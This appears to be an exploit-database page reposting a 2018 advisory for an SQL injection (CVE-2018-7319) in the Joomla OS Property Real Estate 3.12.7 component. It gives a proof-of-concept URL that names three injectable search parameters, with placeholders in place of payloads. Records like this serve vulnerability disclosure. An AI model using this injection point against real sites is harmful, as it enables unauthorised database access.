Advertisement






Joomla! Component OS Property Real Estate 3.12.7 SQL Injection

CVE Category Price Severity
CVE-2018-7319 CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2018-02-23
CPE
cpe:cpe:/a:joomla:os_property_real_estate:3.12.7
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.000000001 0.00000000000002

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018020258

Below is a copy:

Joomla! Component OS Property Real Estate 3.12.7 SQL Injection
# # # #
# Exploit Title: Joomla! Component OS Property Real Estate 3.12.7 - SQL Injection
# Dork: N/A
# Date: 22.02.2018
# Vendor Homepage: https://www.joomdonation.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/os-property/
# Version: 3.12.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-7319
# # # #
# Exploit Author: Ihsan Sencan
# # # #
# 
# POC: 
# 
# 1)
# http://localhost/[PATH]/os-property-layouts/search-tools/advanced-search?&option=com_osproperty&task=property_advsearch
# &cooling_system1=[SQL]
# &heating_system1=[SQL]
# &laundry=[SQL]
# 
# # # #

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.